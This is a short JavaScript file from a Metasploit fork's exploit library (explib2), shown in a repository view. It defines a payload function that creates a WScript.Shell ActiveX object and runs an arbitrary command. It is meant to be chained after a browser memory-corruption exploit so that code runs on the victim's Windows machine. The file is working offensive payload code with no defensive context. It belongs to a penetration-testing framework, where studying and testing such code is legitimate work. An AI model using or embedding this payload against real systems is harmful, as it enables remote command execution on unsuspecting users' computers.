Files
metasploit-gs/data/js/memory/explib2/payload/exec.js
T
2014-03-28 10:44:13 -05:00

11 lines
173 B
JavaScript

function payload_exec(cmd) {
this.execute = function(explib) {
var WshShell = new ActiveXObject("WScript.shell");
var oExec = WshShell.Exec(cmd);
}
return this;
}